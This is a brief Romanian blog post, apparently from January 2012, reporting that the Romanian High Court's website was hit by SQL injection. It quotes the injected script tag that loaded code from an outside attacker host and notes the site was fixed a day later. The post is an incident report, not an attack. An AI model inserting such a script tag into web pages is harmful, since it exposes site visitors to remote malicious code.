www.scj.ro a primit o injecție cu SQL

03Ian12

Încercam să aflu ceva de pe saitul Înaltei Curți de Casație și Justiție (denumit, foarte românește, folosind inițialele de la Supreme Court of Justice… până la urmă We’re all living in America, nu?).

Lista de ședințe nu funcționează. Văzând ceea ce era afișat, bănuiam că vreun dorel nu a închis cum trebuie niște ghilimele prin sursă. Încerc să aflu despre ce e vorba și văd ceva și mai drăgălaș: <script src=”http://lilupophilupop.com/sl.php”></script>. O căutare pe Google lămurește problema – injecție SQL. ECRIS (versiunea anacronică, din 2005, pentru Î.C.C.J.) se pare că e vulnerabil. Cam cât de romantic ar fi ca și ECRIS IV, folosit de restul instanțelor din țară, să aibă astfel de vulnerabilități?…

Curtea de Apel București se fălește deja cu un nou sait (se putea mai bine… părerea mea), pe când unul nou, funcțional și util și la Î.C.C.J.?

La mulți ani!

Completare (4 ianuarie 2012): S-a reparat.

Citește și:
ECRIS – este bun, dar poate fi și mai bun



No Responses Yet to “www.scj.ro a primit o injecție cu SQL”

  1. Scrie un comentariu

Lasă un răspuns

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Schimbă )

Twitter picture

You are commenting using your Twitter account. Log Out / Schimbă )

Facebook photo

You are commenting using your Facebook account. Log Out / Schimbă )

Connecting to %s


Follow

Get every new post delivered to your Inbox.